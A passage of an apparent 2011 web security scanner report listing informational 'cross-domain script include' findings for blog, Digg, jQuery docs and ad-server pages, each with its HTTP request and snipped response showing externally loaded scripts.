Content-Type: text/html; charset=UTF-8
Content-Length: 32336

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>

<!-- feeds -->
<link rel="
...[SNIP]...
</script>
<script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js?ver=1.5.0'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=mericstream"></script>
...[SNIP]...

16.14. http://blog.softlayer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.softlayer.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: blog.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:18 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0a DAV/2
X-Pingback: http://blog.softlayer.com/xmlrpc.php
Link: <http://wp.me/1gwb0>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- Begin Marketo Munchkin Tracker -->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<div class="execphpwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201127.js" type="text/javascript"></script>
...[SNIP]...

16.15. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=1306444613329_0b6a_7430_ae20_acaad3f30011; mstcid=173653f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_blog/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:19:43 GMT
Content-Length: 116302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<meta name="msvalidate.01" content="B717AD6FC29D3A844832AF011B5F9E4C" />
<SCRIPT SRC="http://www.microsoft.com/presspass/blog/js/wt.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
<!-- Version: MS.3.0.0 -->
<script src="http://www.microsoft.com/presspass/blog/js/wt.js" type="text/javascript"></script>
...[SNIP]...

16.16. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx HTTP/1.1
Host: blogs.technet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_on_the_issues/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:21:29 GMT
Content-Length: 112213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<meta name="msvalidate.01" content="B717AD6FC29D3A844832AF011B5F9E4C" />
<SCRIPT SRC="http://www.microsoft.com/presspass/blog/js/wt.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- Version: MS.3.0.0 -->
<script src="http://www.microsoft.com/presspass/blog/js/wt.js" type="text/javascript"></script>
...[SNIP]...

16.17. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx HTTP/1.1
Host: blogs.technet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_on_the_issues/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:21:29 GMT
Content-Length: 143939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<meta name="msvalidate.01" content="B717AD6FC29D3A844832AF011B5F9E4C" />
<SCRIPT SRC="http://www.microsoft.com/presspass/blog/js/wt.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- Version: MS.3.0.0 -->
<script src="http://www.microsoft.com/presspass/blog/js/wt.js" type="text/javascript"></script>
...[SNIP]...

16.18. http://developers.digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.digg.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: developers.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESS395417e620b9b9b47288b47745f54be6=98edcda430c01adc5de44ed3b21784ec; expires=Fri, 29-Jul-2011 14:54:56 GMT; path=/; domain=.developers.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5997
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</div>
<script type="text/javascript" src="http://developers.diggstatic.com/sites/developers.digg.com/files/js/js_ed7cfc7e236bcf41100ab5124937bce0.js"></script>
...[SNIP]...

16.19. http://digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script> <script src="http://cdn1.diggstatic.com/js/two_column/App_TopNews/pagination.f8efea3b.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.20. http://digg.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div> <script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
<script src="http://cdn1.diggstatic.com/js/two_column/DUI/DUI.SnConnector.3b91394f.js" type="text/javascript"></script>
<script src="http://cdn3.diggstatic.com/js/two_column/App_Auth/register.5041f14e.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.21. http://digg.com/register

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div> <script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
<script src="http://cdn1.diggstatic.com/js/two_column/DUI/DUI.SnConnector.3b91394f.js" type="text/javascript"></script>
<script src="http://cdn3.diggstatic.com/js/two_column/App_Auth/register.5041f14e.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.22. http://digg.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script> <script src="http://cdn4.diggstatic.com/js/two_column/App_Search/index.0d09906b.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.23. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.24. http://digg.com/topic

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.25. http://digg.com/upcoming

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script> <script src="http://cdn4.diggstatic.com/js/two_column/App_Upcoming/pagination.5961da48.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.26. http://docs.jquery.com/Tutorials:Introducing_$(document

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /Tutorials:Introducing_$(document

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Tutorials:Introducing_$(document HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 14566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.27. http://docs.jquery.com/UI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-language: en
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.28. http://docs.jquery.com/UI/Accordion

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Accordion

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Accordion HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-Length: 45021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.29. http://docs.jquery.com/UI/Effects/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/

Issue detail

The response dynamically includes the following script from another domain (visible in the response excerpt below):

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.30. http://docs.jquery.com/UI/Effects/Slide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Slide

Issue detail

The response dynamically includes the following script from another domain (visible in the response excerpt below):

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Slide HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-language: en
Content-Length: 18254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.31. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain (visible in the response excerpt below):

http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:55:04 GMT
Server: cafe
Cache-Control: private
Content-Length: 3735
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js"></script>
...[SNIP]...

16.32. http://jobs.digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jobs.digg.com
Path:   /

Issue detail

The response dynamically includes the following scripts from another domain (visible in the response excerpt below):

http://developers.diggstatic.com/files/js/js_3374eb497ebd53f80f03b51776636451.js
http://developers.diggstatic.com/sites/all/modules/jobvite/js/widget20.js?9
http://developers.diggstatic.com/sites/all/modules/jobvite/js/source.js?9

Request

GET / HTTP/1.1
